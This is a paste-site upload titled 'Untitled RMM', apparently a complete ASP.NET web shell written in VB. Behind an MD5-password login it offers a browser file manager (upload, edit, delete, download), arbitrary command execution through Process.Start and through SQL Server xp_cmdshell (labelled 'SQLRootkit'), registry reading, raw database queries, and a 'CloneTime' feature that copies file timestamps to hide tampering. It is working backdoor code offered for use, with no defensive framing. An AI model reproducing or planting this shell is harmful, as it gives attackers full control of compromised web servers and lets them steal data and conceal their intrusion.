
Untitled RMM

Dec 6th, 2024
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text 46.30 KB | None | 0 0
  1. <%@ Page Language="VB" ContentType="text/html" validaterequest="false" AspCompat="true" Debug="true" %>
  2. <%@ import Namespace="System.IO" %>
  3. <%@ import Namespace="System.Diagnostics" %>
  4. <%@ import Namespace="Microsoft.Win32" %>
  5. <%@ import Namespace="System.Data" %>
  6. <%@ import Namespace="System.Data.OleDb" %>
  7. <script runat="server">
  9. '---------Setting Start---------
  10. 'Here, modify the default password to yours, MD5 Hash
  11. Const PASSWORD as string = "21232f297a57a5a743894a0e4a801fc3"
  12. 'Session name, avoid session crash
  13. Const SESSIONNAME as string = "webadmin2"
  14. '---------Setting End---------
  16. Dim SORTFILED As String
  18. Sub Page_load(sender As Object, E As EventArgs)
  19. Dim error_x as Exception
  20. Try
  21. If Session(SESSIONNAME) = 0 Then
  22. ShowLogin()
  23. Else
  24. ShowMain()
  25. If not IsPostBack Then
  26. Select Case Request("action")
  27. Case "goto"
  28. CDir.Text = Request("src")
  29. Call ShowFolders(CDir.Text)
  30. Case "copy"
  31. Call ShowCopy(Request("src"))
  32. Case "cut"
  33. Call ShowCut(Request("src"))
  34. Case "down"
  35. Call DownLoadIt(Request("src"))
  36. Case "edit"
  37. Call ShowEdit(Request("src"))
  38. Case "del"
  39. Call ShowDel(Request("src"))
  40. Case "rename"
  41. Call ShowRn(Request("src"))
  42. Case "att"
  43. Call ShowAtt(Request("src"))
  44. End Select
  45. End If
  46. End If
  47. Catch error_x
  48. ShowError(error_x.Message)
  49. End Try
  50. End Sub
  52. Sub Login_click(sender As Object, E As EventArgs)
  53. Dim MD5Pass As String = LCase(FormsAuthentication.HashPasswordForStoringInConfigFile(UPass.Text, "MD5"))
  54. If MD5Pass=PASSWORD Then
  55. Session(SESSIONNAME) = 1
  56. Call ShowMain()
  57. Else
  58. Label_Info.Text = "<b>NO, no, you don't my ��</b>"
  59. End If
  60. End Sub
  62. Sub GoTo_click(sender As Object, E As EventArgs)
  63. ULOGIN.Visible= False
  64. MAIN.Visible = True
  65. FileManager.Visible = True
  66. CMD.Visible = false
  67. CloneTime.Visible = False
  68. SQLROOTKIT.Visible = False
  69. SysInfo.Visible = False
  70. Reg.Visible = False
  71. DATA.Visible = False
  72. About.Visible = False
  73. Call ShowFolders(CDir.Text)
  74. End Sub
  76. Sub ShowError(ErrorMsg As String)
  77. Label_Info.Text = "<font color=""red""><b>Wrong: </b></font>" & ErrorMsg
  78. End Sub
  80. Sub ShowMain()
  81. Label_Info.Text = "��ӭ���١������ǰݷ� !"
  82. ULOGIN.Visible = False
  83. MAIN.Visible = True
  84. End Sub
  86. Sub ShowDrives()
  87. Label_Drives.Text = "Go To : "
  88. Label_Drives.Text += "<a href=""?action=goto&src=" & Server.URLEncode(Server.MapPath(".")) & """> . </a> "
  89. Label_Drives.Text += "<a href=""?action=goto&src=" & Server.URLEncode(Server.MapPath("/")) & """> / </a> "
  90. dim i as integer
  91. for i =0 to Directory.GetLogicalDrives().length-1
  92. Label_Drives.Text += "<a href=""?action=goto&src=" & Directory.GetLogicalDrives(i) & """>" & Directory.GetLogicalDrives(i) & " </a>"
  93. next
  94. End Sub
  96. Sub Logout_click(sender As Object, E As EventArgs)
  97. Session.Abandon()
  98. Label_Info.Text = "<b>Byebye !</b>"
  99. Call ShowLogin()
  100. End Sub
  102. Sub ShowFileM(sender As Object, E As EventArgs)
  103. ULOGIN.Visible= False
  104. MAIN.Visible = True
  105. FileManager.Visible = True
  106. CMD.Visible = False
  107. CloneTime.Visible = False
  108. SQLROOTKIT.Visible = False
  109. SysInfo.Visible = False
  110. Reg.Visible = False
  111. DATA.Visible = False
  112. About.Visible = False
  113. If CDir.Text = "" Then
  114. CDir.Text = Server.MapPath(".")
  115. End If
  116. Call ShowFolders(CDir.Text)
  117. End Sub
  119. Sub ShowFolders(FPath As String)
  120. Dim error_x as Exception
  121. Try
  122. Call ShowDrives()
  123. If right(FPath,1)<>"\" Then
  124. FPath += "\"
  125. End If
  127. dim xdir as directoryinfo
  128. dim mydir as new DirectoryInfo(FPath)
  129. dim xfile as fileinfo
  130. Label_Files.Text = "<table width=""90%"" border=""0"" align=""center"">"
  131. Label_Files.Text += "<tr><td width=""40%""><b>Name</b></td><td width=""15%""><b>Size</b></td>"
  132. Label_Files.Text += "<td width=""20%""><b>ModifyTime</b></td><td width=""25%""><b>Operate</b></td></tr>"
  133. Label_Files.Text += "<tr><td><tr><td><a href='?action=goto&src="
  134. Dim tmp As String
  135. If Len(FPath) < 4 Then
  136. tmp = server.UrlEncode(FPath)
  137. Else
  138. tmp = server.UrlEncode(Directory.GetParent(Left(FPath,Len(FPath)-1)).ToString())
  139. End If
  140. Label_Files.Text += tmp & "'><i>|Parent Directory|</i></a></td></tr>"
  141. For each xdir in mydir.getdirectories()
  142. Label_Files.Text += "<tr><td>"
  143. dim filepath as string = server.UrlEncode(FPath & xdir.name)
  144. Label_Files.Text += "<a href='?action=goto&src=" & filepath & "\" & "'>" & xdir.name & "</a></td>"
  145. Label_Files.Text += "<td><dir></td>"
  146. Label_Files.Text += "<td>" & Directory.GetLastWriteTime(FPath & "\" & xdir.name) & "</td>"
  147. Label_Files.Text += "<td><a href='?action=cut&src=" & filepath & "\' target='_blank'>Cut" & "</a>|"
  148. Label_Files.Text += "<a href='?action=copy&src=" & filepath & "\' target='_blank'>Copy</a>|"
  149. Label_Files.Text += "<a href='?action=rename&src=" & filepath & "' target='_blank'>Ren</a>|"
  150. Label_Files.Text += "<a href='?action=att&src=" & filepath & "\'" & "' target=_blank'>Att</a>|"
  151. Label_Files.Text += "<a href='?action=del&src=" & filepath & "\'" & "' target=_blank'>Del</a></td>"
  152. Label_Files.Text += "</tr>"
  153. Next
  154. Label_Files.Text += "</td></tr><tr><td>"
  155. For each xfile in mydir.getfiles()
  156. dim filepath2 as string
  157. filepath2=server.UrlEncode(FPath & xfile.name)
  158. Label_Files.Text += "<tr><td>" & xfile.name & "</td>"
  159. Label_Files.Text += "<td>" & GetSize(xfile.length) & "</td>"
  160. Label_Files.Text += "<td>" & file.GetLastWriteTime(FPath & xfile.name) & "</td>"
  161. Label_Files.Text += "<td><a href='?action=edit&src=" & filepath2 & "' target='_blank'>Edit</a>|"
  162. Label_Files.Text += "<a href='?action=cut&src=" & filepath2 & "' target='_blank'>Cut</a>|"
  163. Label_Files.Text += "<a href='?action=copy&src=" & filepath2 & "' target='_blank'>Copy</a>|"
  164. Label_Files.Text += "<a href='?action=rename&src=" & filepath2 & "' target='_blank'>Ren</a>|"
  165. Label_Files.Text += "<a href='?action=down&src=" & filepath2 & "'>Down</a>|"
  166. Label_Files.Text += "<a href='?action=att&src=" & filepath2 & "' target=_blank'>Att</a>|"
  167. Label_Files.Text += "<a href='?action=del&src=" & filepath2 & "' target=_blank'>Del</a></td>"
  168. Label_Files.Text += "</tr>"
  169. Next
  170. Label_Files.Text += "</table>"
  171. Catch error_x
  172. ShowError(error_x.Message)
  173. End Try
  174. End Sub
  176. Function GetSize(temp)
  177. if temp < 1024 then
  178. GetSize=temp & " bytes"
  179. else
  180. if temp\1024 < 1024 then
  181. GetSize=temp\1024 & " KB"
  182. else
  183. if temp\1024\1024 < 1024 then
  184. GetSize=temp\1024\1024 & " MB"
  185. else
  186. GetSize=temp\1024\1024\1024 & " GB"
  187. end if
  188. end if
  189. end if
  190. End Function
  192. Sub ShowLogin()
  193. ULOGIN.Visible= True
  194. MAIN.Visible = False
  195. FileManager.Visible = False
  196. CMD.Visible = False
  197. CloneTime.Visible = False
  198. SQLROOTKIT.Visible = False
  199. SysInfo.Visible = False
  200. Reg.Visible = False
  201. DATA.Visible = False
  202. About.Visible = False
  203. End Sub
  205. 'Show Cmd
  206. Sub Button_showcmd_Click(sender As Object, E As EventArgs)
  207. ULOGIN.Visible = False
  208. MAIN.Visible = True
  209. FileManager.Visible = False
  210. CMD.Visible = True
  211. CloneTime.Visible = False
  212. SQLROOTKIT.Visible = False
  213. SysInfo.Visible = False
  214. Reg.Visible = False
  215. DATA.Visible = False
  216. About.Visible = False
  217. End Sub
  219. 'Show clonetime
  220. Sub Button_showclone_Click(sender As Object, E As EventArgs)
  221. ULOGIN.Visible = False
  222. MAIN.Visible = True
  223. FileManager.Visible = False
  224. CMD.Visible = False
  225. CloneTime.Visible = True
  226. SQLROOTKIT.Visible = False
  227. SysInfo.Visible = False
  228. Reg.Visible = False
  229. DATA.Visible = False
  230. About.Visible = False
  231. End Sub
  233. Sub Button_showcmdshell_Click(sender As Object, E As EventArgs)
  234. ULOGIN.Visible = False
  235. MAIN.Visible = True
  236. FileManager.Visible = False
  237. CMD.Visible = False
  238. CloneTime.Visible = False
  239. SQLROOTKIT.Visible = True
  240. SysInfo.Visible = False
  241. Reg.Visible = False
  242. DATA.Visible = False
  243. About.Visible = False
  244. End Sub
  246. Sub Button_showinfo_Click(sender As Object, E As EventArgs)
  247. ULOGIN.Visible = False
  248. MAIN.Visible = True
  249. FileManager.Visible = False
  250. CMD.Visible = False
  251. CloneTime.Visible = False
  252. SQLROOTKIT.Visible = False
  253. SysInfo.Visible = True
  254. Reg.Visible = False
  255. DATA.Visible = False
  256. About.Visible = False
  257. ServerIP.Text = request.ServerVariables("LOCAL_ADDR")
  258. MachineName.Text = Environment.MachineName
  259. UserDomainName.Text = Environment.UserDomainName.ToString()
  260. UserName.Text = Environment.UserName
  261. OS.Text = Environment.OSVersion.ToString()
  262. StartTime.Text = GetStartedTime(Environment.Tickcount) & "Hours"
  263. NowTime.Text = Now()
  264. IISV.Text = request.ServerVariables("SERVER_SOFTWARE")
  265. HTTPS.Text = request.ServerVariables("HTTPS")
  266. PATHS.Text = request.ServerVariables("PATH_INFO")
  267. PATHS2.Text = request.ServerVariables("PATH_TRANSLATED")
  268. PORT.Text = request.ServerVariables("SERVER_PORT")
  269. SID.Text = Session.SessionID
  270. End Sub
  272. Function GetStartedTime(ms)
  273. GetStartedTime=cint(ms/(1000*60*60))
  274. End function
  276. Sub ShowReg(Src As Object, E As EventArgs)
  277. ULOGIN.Visible = False
  278. MAIN.Visible = True
  279. FileManager.Visible = False
  280. CMD.Visible = False
  281. CloneTime.Visible = False
  282. SQLROOTKIT.Visible = False
  283. SysInfo.Visible = False
  284. Reg.Visible = True
  285. DATA.Visible = False
  286. About.Visible = False
  287. End Sub
  289. Sub ShowData(Src As Object, E As EventArgs)
  290. ULOGIN.Visible = False
  291. MAIN.Visible = True
  292. FileManager.Visible = False
  293. CMD.Visible = False
  294. CloneTime.Visible = False
  295. SQLROOTKIT.Visible = False
  296. SysInfo.Visible = False
  297. Reg.Visible = False
  298. DATA.Visible = True
  299. About.Visible = False
  300. End Sub
  302. Sub ShowAbout(Src As Object, E As EventArgs)
  303. ULOGIN.Visible = False
  304. MAIN.Visible = True
  305. FileManager.Visible = False
  306. CMD.Visible = False
  307. CloneTime.Visible = False
  308. SQLROOTKIT.Visible = False
  309. SysInfo.Visible = False
  310. Reg.Visible = False
  311. DATA.Visible = False
  312. About.Visible = True
  313. End Sub
  315. Sub ShowEdit( filepath as string)
  316. ULOGIN.Visible = False
  317. MAIN.Visible = false
  318. FileManager.Visible = False
  319. CMD.Visible = False
  320. CloneTime.Visible = False
  321. SQLROOTKIT.Visible = False
  322. SysInfo.Visible = False
  323. Reg.Visible = False
  324. DATA.Visible = False
  325. About.Visible = False
  326. File_Edit.Visible = true
  327. edited_path.Text = filepath
  328. dim myread as new streamreader(filepath, encoding.default)
  329. edited_path.text = filepath
  330. edited_content.text=myread.readtoend
  331. myread.close()
  332. End Sub
  334. Sub ShowDel( filepath as string)
  335. MAIN.Visible = false
  336. FileManager.Visible = False
  337. File_del.Visible = True
  338. label_del.Text = "Are u sure delete file/Folder <b>" & filepath & "</b> ?"
  339. End Sub
  341. Sub ShowRn( filepath as string)
  342. MAIN.Visible = false
  343. FileManager.Visible = False
  344. File_Rename.Visible = True
  345. btn_rename.Text = path.getfilename(filepath)
  346. End Sub
  348. Sub RunCMD(Src As Object, E As EventArgs)
  349. Dim error_x as Exception
  350. Try
  351. Dim myProcess As New Process()
  352. Dim myProcessStartInfo As New ProcessStartInfo(cmdPath.Text)
  353. myProcessStartInfo.UseShellExecute = False
  354. myProcessStartInfo.RedirectStandardOutput = true
  355. myProcess.StartInfo = myProcessStartInfo
  356. myProcessStartInfo.Arguments = CMDCommand.text
  357. myProcess.Start()
  358. Dim myStreamReader As StreamReader = myProcess.StandardOutput
  359. Dim myString As String = myStreamReader.Readtoend()
  360. myProcess.Close()
  361. mystring=replace(mystring,"<","<")
  362. mystring=replace(mystring,">",">")
  363. CMDresult.text = "<pre>" & mystring & "</pre>"
  364. Catch error_x
  365. ShowError(error_x.Message)
  366. End Try
  367. End Sub
  369. Sub GoCloneTime(Src As Object, E As EventArgs)
  370. Dim error_x as Exception
  371. Try
  372. Dim thisfile As FileInfo =New FileInfo(time1.Text)
  373. Dim thatfile As FileInfo =New FileInfo(time2.Text)
  374. thisfile.LastWriteTime = thatfile.LastWriteTime
  375. thisfile.LastAccessTime = thatfile.LastAccessTime
  376. thisfile.CreationTime = thatfile.CreationTime
  377. Label_cloneResult.Text = "<font color=""red"">Clone Time Success!</font>"
  378. Catch error_x
  379. ShowError(error_x.Message)
  380. End Try
  381. End Sub
  383. Sub CMDSHELL(Src As Object, E As EventArgs)
  384. Dim error_x as Exception
  385. Try
  386. Dim adoConn,strQuery,recResult,strResult
  387. adoConn=Server.CreateObject("ADODB.Connection")
  388. adoConn.Open(ConStr.Text)
  389. If Sqlcmd.Text<>"" Then
  390. strQuery = "exec master.dbo.xp_cmdshell '" & Sqlcmd.Text & "'"
  391. recResult = adoConn.Execute(strQuery)
  392. If NOT recResult.EOF Then
  393. Do While NOT recResult.EOF
  394. strResult = strResult & chr(13) & recResult(0).value
  395. recResult.MoveNext
  396. Loop
  397. End if
  398. recResult = Nothing
  399. strResult = Replace(strResult," ","&nbsp;")
  400. strResult = Replace(strResult,"<","<")
  401. strResult = Replace(strResult,">",">")
  402. resultSQL.Text=SqlCMD.Text & vbcrlf & "<pre>" & strResult & "</pre>"
  403. End if
  404. adoConn.Close
  405. Catch error_x
  406. ShowError(error_x.Message)
  407. End Try
  408. End Sub
  410. Sub ReadReg(Src As Object, E As EventArgs)
  411. Dim error_x as Exception
  412. Try
  413. Dim hu As String = RegKey.Text
  414. Dim rk As RegistryKey
  415. Select Mid( hu ,1 , Instr( hu,"\" )-1 )
  416. case "HKEY_LOCAL_MACHINE"
  417. rk = Registry.LocalMachine.OpenSubKey( Right(hu , Len(hu) - Instr( hu,"\" )) , 0 )
  418. case "HKEY_CLASSES_ROOT"
  419. rk = Registry.ClassesRoot.OpenSubKey( Right(hu , Len(hu) - Instr( hu,"\" )) , 0 )
  420. case "HKEY_CURRENT_USER"
  421. rk = Registry.CurrentUser.OpenSubKey( Right(hu , Len(hu) - Instr( hu,"\" )) , 0 )
  422. case "HKEY_USERS"
  423. rk = Registry.Users.OpenSubKey( Right(hu , Len(hu) - Instr( hu,"\" )) , 0 )
  425. rk = Registry.CurrentConfig.OpenSubKey( Right(hu , Len(hu) - Instr( hu,"\" )) , 0 )
  426. End Select
  427. RegResult.Text = rk.GetValue(RegValue.Text , "NULL")
  428. rk.Close()
  429. Catch error_x
  430. ShowError(error_x.Message)
  431. End Try
  432. End Sub
  434. Sub DB_onrB_1(sender As Object, E As EventArgs)
  435. DataCStr.Text = "server=;UID=sa;PWD=;database=news;Provider=SQLOLEDB"
  436. Type_Acc.Checked = false
  437. Type_SQL.Checked = true
  438. End Sub
  440. Sub DB_onrB_2(sender As Object, E As EventArgs)
  441. Type_Acc.Checked = true
  442. Type_SQL.Checked = false
  443. DataCStr.Text = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=E:\MyWeb\UpdateWebadmin\guestbook.mdb"
  444. End Sub
  446. Sub DB_Submit_Click(sender As Object, E As EventArgs)
  447. Dim error_x as Exception
  448. Try
  449. DB_eButton.Visible = True
  450. DB_eString.Visible = True
  451. DB_exe.Visible = True
  452. db_showTable.Text = "<br><b>The Tables :</b><br>"
  453. Dim i As Integer
  454. Dim db_conn As New OleDbConnection(DataCStr.Text)
  455. Dim db_schemaTable As DataTable
  456. db_conn.open()
  457. db_schemaTable = db_conn.GetOleDbSchemaTable(OleDbSchemaGuid.Tables, New Object() {Nothing, Nothing, Nothing, "TABLE"})
  458. For i = 0 To db_schemaTable.Rows.Count - 1
  459. db_showTable.Text += db_schemaTable.Rows(i)!TABLE_NAME.ToString & "<br>"
  460. Next i
  461. db_conn.close()
  462. Catch error_x
  463. ShowError(error_x.Message)
  464. End Try
  465. End Sub
  467. Sub DB_Page(sender As Object, e As System.Web.UI.WebControls.DataGridPageChangedEventArgs)
  468. DB_DataGrid.CurrentPageIndex = e.NewPageIndex
  469. Call BindData()
  470. End Sub
  472. Sub DB_Sort(sender As Object, E As DataGridSortCommandEventArgs)
  473. SORTFILED = E.SortExpression
  474. Call BindData()
  475. End Sub
  477. Sub DB_Exec_Click(sender As Object, E As EventArgs)
  478. DB_ExecRes.Text = ""
  479. If LCase(Left(DB_EString.Text, 6)) = "select" Then
  480. Call BindData()
  481. Else
  482. Call DB_Exec()
  483. End If
  484. End Sub
  486. Sub DB_Exec()
  487. Dim error_x as Exception
  488. Try
  489. Dim db_conn As New OleDbConnection(DataCStr.Text)
  490. Dim db_cmd As New OleDbCommand( DB_EString.Text , db_conn )
  491. db_conn.Open()
  492. db_cmd.ExecuteNonQuery()
  493. db_conn.Close()
  494. DB_ExecRes.Text = "<b>Done! </b>"
  495. Catch error_x
  496. ShowError(error_x.Message)
  497. End Try
  498. End Sub
  500. Function myGetTableName(SQLS As String)
  501. Dim TEMP, TEMP2 As String
  502. TEMP = Right(SQLs, Len(SQLS) - Instr(1, SQLs, "from", 1) - 3 )
  503. Dim i As Integer
  504. For i = 1 to Len(TEMP)
  505. If Mid(TEMP, i, 1) <> vbcrlf Then
  506. TEMP2 += Mid(TEMP, i, 1)
  507. Else
  508. Exit For
  509. End If
  510. Next
  511. myGetTableName = TEMP2
  512. End Function
  514. Sub BindData()
  515. Dim error_x as Exception
  516. Try
  517. Dim myTableName As String = myGetTableName(DB_EString.Text)
  518. Dim db_conn As New OleDbConnection(DataCStr.Text)
  519. Dim db_cmd As New OleDbCommand( DB_EString.Text , db_conn )
  520. Dim db_adp As New OleDbDataAdapter(db_cmd)
  521. Dim db_ds As New DataSet()
  522. db_adp.Fill(db_ds,myTableName)
  523. DB_DataGrid.DataSource = db_ds.Tables(myTableName).DefaultView
  524. db_ds.Tables(myTableName).DefaultView.Sort = SORTFILED
  525. DB_DataGrid.DataBind()
  526. Catch error_x
  527. ShowError(error_x.Message)
  528. End Try
  529. End Sub
  531. Sub DownLoadIt(thePath)
  532. Dim error_x as Exception
  533. Try
  534. dim stream
  535. stream=server.createObject("adodb.stream")
  536. stream.open
  537. stream.type=1
  538. stream.loadFromFile(thePath)
  539. response.addHeader("Content-Disposition", "attachment; filename=" & replace(server.UrlEncode(path.getfilename(thePath)),"+"," "))
  540. response.addHeader("Content-Length",stream.Size)
  541. response.charset="UTF-8"
  542. response.contentType="application/octet-stream"
  543. response.binaryWrite(stream.read)
  544. response.flush
  545. stream.close
  546. stream=nothing
  547. response.End()
  548. Catch error_x
  549. ShowError(error_x.Message)
  550. End Try
  551. End Sub
  553. sub FileEdit(Src As Object, E As EventArgs)
  554. Dim error_x as Exception
  555. Try
  556. dim mywrite as new streamwriter(edited_path.text, false, encoding.default)
  557. mywrite.write(edited_content.text)
  558. mywrite.close
  559. response.Write("<script>alert('Edit|Creat " & replace(edited_path.text,"\","\\") & " Success! Please refresh')</sc"&"ript>")
  560. Catch error_x
  561. ShowError(error_x.Message)
  562. End Try
  563. end sub
  565. sub FileDel(Src As Object, E As EventArgs)
  566. Call del( Request("src") )
  567. end sub
  569. Sub del(a as string)
  570. if right(a,1)="\" then
  571. dim xdir as directoryinfo
  572. dim mydir as new DirectoryInfo(a)
  573. dim xfile as fileinfo
  574. for each xfile in mydir.getfiles()
  575. file.delete(a & xfile.name)
  576. next
  577. for each xdir in mydir.getdirectories()
  578. call del(a & xdir.name & "\")
  579. next
  580. directory.delete(a)
  581. else
  582. file.delete(a)
  583. end if
  584. response.Write("<script>alert('Delete " & replace(a,"\","\\") & " Success! Please refresh')</sc"&"ript>")
  585. response.Write("<script>location.href='JavaScript:self.close()';</sc"&"ript>")
  586. End Sub
  588. Sub rn_rn_Click(Src As Object, E As EventArgs)
  589. Dim error_x as Exception
  590. Try
  591. Rename( request("src"), Directory.GetParent(request("src")).ToString() & "\" & btn_rename.Text )
  592. response.Write("<script>alert('Rename Success! Please refresh')</sc"&"ript>")
  593. response.Write("<script>location.href='JavaScript:self.close()';</sc"&"ript>")
  594. Catch error_x
  595. ShowError(error_x.Message)
  596. End Try
  597. End Sub
  599. Sub NewFile(Src As Object, E As EventArgs)
  600. Dim error_x as Exception
  601. Try
  602. Dim temp As String
  603. If right(CDir.Text, 1) <> "\" Then
  604. temp = CDir.Text & "\"
  605. Else
  606. temp = CDir.Text
  607. End If
  608. dim mywrite as new streamwriter(temp & TextBox_FDName.Text, true, encoding.default)
  609. mywrite.close
  610. label_info.Text = "Create File Success !"
  611. Call ShowFolders(CDir.Text)
  612. TextBox_FDName.Text = ""
  613. Catch error_x
  614. ShowError(error_x.Message)
  615. End Try
  616. End Sub
  618. Sub NewFolder(Src As Object, E As EventArgs)
  619. Dim error_x as Exception
  620. Try
  621. Dim temp As String
  622. If right(CDir.Text, 1) <> "\" Then
  623. temp = CDir.Text & "\"
  624. Else
  625. temp = CDir.Text
  626. End If
  627. directory.createdirectory(temp & TextBox_FDName.Text)
  628. label_info.Text = "Create Folder Success !"
  629. Call ShowFolders(CDir.Text)
  630. TextBox_FDName.Text = ""
  631. Catch error_x
  632. ShowError(error_x.Message)
  633. End Try
  634. End Sub
  636. Sub UpLoad(Src As Object, E As EventArgs)
  637. Dim error_x as Exception
  638. Try
  639. Dim temp As String
  640. If right(CDir.Text, 1) <> "\" Then
  641. temp = CDir.Text & "\"
  642. Else
  643. temp = CDir.Text
  644. End If
  645. dim filename,loadpath as string
  646. filename = path.getfilename(UpFile.value)
  647. loadpath = temp & filename
  648. UpFile.postedfile.saveas(loadpath)
  649. label_info.Text = "Upload File Success !"
  650. Call ShowFolders(CDir.Text)
  651. Catch error_x
  652. ShowError(error_x.Message)
  653. End Try
  654. End Sub
  656. Sub ShowAtt(path As String)
  657. MAIN.Visible = false
  658. FileManager.Visible = False
  659. File_Att.Visible = True
  660. If (File.GetAttributes(path) And FileAttributes.Hidden) = FileAttributes.Hidden Then
  661. Hide.Checked = True
  662. End If
  663. If (File.GetAttributes(path) And FileAttributes.ReadOnly) = FileAttributes.ReadOnly Then
  664. onlyread.Checked = True
  665. End If
  666. If (File.GetAttributes(path) And FileAttributes.System) = FileAttributes.System Then
  667. sys.Checked = True
  668. End If
  669. If (File.GetAttributes(path) And FileAttributes.Archive) = FileAttributes.Archive Then
  670. Archive.Checked = True
  671. End If
  672. End Sub
  674. Sub SetAttributes( path As String)
  675. If onlyread.Checked = True Then
  676. File.SetAttributes(path, File.GetAttributes(path) Or FileAttributes.ReadOnly)
  677. Else
  678. If (File.GetAttributes(path) And FileAttributes.ReadOnly) = FileAttributes.ReadOnly Then
  679. File.SetAttributes(path, File.GetAttributes(path) - FileAttributes.ReadOnly)
  680. End If
  681. End If
  682. If Hide.Checked = True Then
  683. File.SetAttributes(path, File.GetAttributes(path) Or FileAttributes.Hidden)
  684. Else
  685. If (File.GetAttributes(path) And FileAttributes.Hidden) = FileAttributes.Hidden Then
  686. File.SetAttributes(path, File.GetAttributes(path) - FileAttributes.Hidden)
  687. End If
  688. End If
  689. If sys.Checked = True Then
  690. File.SetAttributes(path, File.GetAttributes(path) Or FileAttributes.System)
  691. Else
  692. If (File.GetAttributes(path) And FileAttributes.System) = FileAttributes.System Then
  693. File.SetAttributes(path, File.GetAttributes(path) - FileAttributes.System)
  694. End If
  695. End If
  696. If Archive.Checked = True Then
  697. File.SetAttributes(path, File.GetAttributes(path) Or FileAttributes.Archive)
  698. Else
  699. If (File.GetAttributes(path) And FileAttributes.Archive) = FileAttributes.Archive Then
  700. File.SetAttributes(path, File.GetAttributes(path) - FileAttributes.Archive)
  701. End If
  702. End If
  703. response.Write("<script>alert('Rename Success! Please refresh')</sc"&"ript>")
  704. response.Write("<script>location.href='JavaScript:self.close()';</sc"&"ript>")
  705. End Sub
  707. Sub Set_Att_Click(Src As Object, E As EventArgs)
  708. Dim error_x as Exception
  709. Try
  710. Call SetAttributes( request("Src") )
  711. Catch error_x
  712. ShowError(error_x.Message)
  713. End Try
  714. End Sub
  716. Sub ShowCopy(path As String)
  717. Session("FileAct") = "Copy"
  718. Session("Source") = path
  719. response.Write("<script>alert('File info have add the cutboard, go to target directory click plaste!')</sc"&"ript>")
  720. response.Write("<script>location.href='JavaScript:self.close()';</sc"&"ript>")
  721. End Sub
  723. Sub ShowCut(path As String)
  724. Session("FileAct") = "Cut"
  725. Session("Source") = path
  726. response.Write("<script>alert('File info have add the cutboard, go to target directory click plaste!')</sc"&"ript>")
  727. response.Write("<script>location.href='JavaScript:self.close()';</sc"&"ript>")
  728. End Sub
  730. Sub Plaste_Click(Src As Object, E As EventArgs)
  731. Dim error_x as Exception
  732. Try
  733. Dim tmp As String = Session("Source")
  734. Dim temp As String
  735. If right(CDir.Text, 1) <> "\" Then
  736. temp = CDir.Text & "\"
  737. Else
  738. temp = CDir.Text
  739. End If
  740. If Session("FileAct") = "Copy" Then
  741. if right(tmp, 1)="\" then
  742. directory.createdirectory(temp & Path.GetFileName(mid(tmp, 1, len(tmp)-1)))
  743. call copydir(tmp, temp & Path.GetFileName(mid(tmp, 1, len(tmp)-1)) & "\" )
  744. Else
  745. file.copy(tmp, temp & Path.GetFileName(tmp))
  746. End If
  747. response.Write("<script>alert('Copy success!');</s"&"cript>")
  748. ElseIf Session("FileAct") = "Cut" Then
  749. if right(tmp, 1)="\" then
  750. directory.move(tmp, temp & Path.GetFileName(mid(tmp, 1, len(tmp)-1)) & "\")
  751. Else
  752. file.move(tmp, temp & Path.GetFileName(tmp) )
  753. End If
  754. response.Write("<script>alert('Cut success!');</s"&"cript>")
  755. Call ShowFolders(CDir.Text)
  756. Else
  757. response.Write("<script>alert('Plaste Fail!');</s"&"cript>")
  758. End If
  759. Catch error_x
  760. ShowError(error_x.Message)
  761. End Try
  762. End Sub
  764. Sub copydir(a As String , b As String)
  765. dim xdir as directoryinfo
  766. dim mydir as new DirectoryInfo(a)
  767. dim xfile as fileinfo
  768. for each xfile in mydir.getfiles()
  769. file.copy(a & xfile.name,b & xfile.name)
  770. next
  771. for each xdir in mydir.getdirectories()
  772. directory.createdirectory(b & path.getfilename(a & xdir.name))
  773. call copydir(a & xdir.name & "\",b & xdir.name & "\")
  774. next
  775. End Sub
  777. </script>
  778. <html>
  779. <head>
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  816. <body>
  817. <form method="post" enctype="multipart/form-data" runat="server">
  818. <asp:Label id="Label_Info" runat="server" enableviewstate="False"></asp:Label>
  819. <br />
  820. <br />
  821. <asp:Panel id="ULOGIN" runat="server" Wrap="False" ToolTip="Login">
  822. <asp:Label id="Label_Pwd" runat="server" enableviewstate="False">Password:</asp:Label>
  823. <asp:TextBox class="TextBox" id="UPass" runat="server" Wrap="False" TextMode="Password"></asp:TextBox>
  824. <asp:Button class="buttom" id="Button_Login" onclick="login_click" runat="server" ToolTip="Click here to login" Text="Login"></asp:Button>
  825. </asp:Panel>
  826. <asp:Panel id="MAIN" runat="server" Wrap="False" ToolTip="Main" Visible="False">
  827. <asp:Label id="Label_tools" runat="server" enableviewstate="False">Function:</asp:Label>
  828. <asp:Button class="buttom" id="Button_filemanager" onclick="ShowFileM" runat="server" Text="File" Width="80px"></asp:Button>
  829. <asp:Button class="buttom" id="Button_cmd" onclick="Button_showcmd_Click" runat="server" Text="Command" Width="80px"></asp:Button>
  830. <asp:Button class="buttom" id="Button_clonetime" onclick="Button_showclone_Click" runat="server" Text="CloneTime" Width="80px"></asp:Button>
  831. <asp:Button class="buttom" id="Button_sqlcmd" onclick="Button_showcmdshell_Click" runat="server" Text="SQLRootkit" Width="80px"></asp:Button>
  832. <asp:Button class="buttom" id="Button_sysinfo" onclick="Button_showinfo_Click" runat="server" Text=" SysInfo " Width="80px"></asp:Button>
  833. <asp:Button class="buttom" id="Button_db" onclick="ShowData" runat="server" Text="Database" Width="80px"></asp:Button>
  834. <asp:Button class="buttom" id="Button_reg" onclick="ShowReg" runat="server" Text="Regedit" Width="80px"></asp:Button>
  835. <asp:Button class="buttom" id="Button_about" onclick="ShowAbout" runat="server" Text="About" Width="80px"></asp:Button>
  836. <asp:Button class="buttom" id="Button_exit" onclick="Logout_click" runat="server" Text="Exit" Width="80px"></asp:Button>
  837. <hr />
  838. </asp:Panel>
  839. <asp:Panel id="FileManager" runat="server" Wrap="False" Width="100%">
  840. <asp:Label id="Label_Drives" runat="server" enableviewstate="False"></asp:Label>
  841. <br />
  842. <asp:Label id="Label_Dir" runat="server" enableviewstate="False">Currently Dir :</asp:Label>
  843. <asp:TextBox class="TextBox" id="CDir" runat="server" Wrap="False" Width="300px"></asp:TextBox>
  844. <asp:Button class="buttom" id="Button_GoTo" onclick="GoTo_click" runat="server" ToolTip="Go to the dir" Text=" Go "></asp:Button>
  845. <asp:Button id="PlasteButton" onclick="Plaste_Click" runat="server" Text="Plaste" CssClass="buttom"></asp:Button>
  846. <br />
  847. <asp:Label id="Label_oper" runat="server" enableviewstate="False">Operate:</asp:Label>
  848. <asp:TextBox class="TextBox" id="TextBox_FDName" runat="server" Wrap="False" Width="100px"></asp:TextBox>
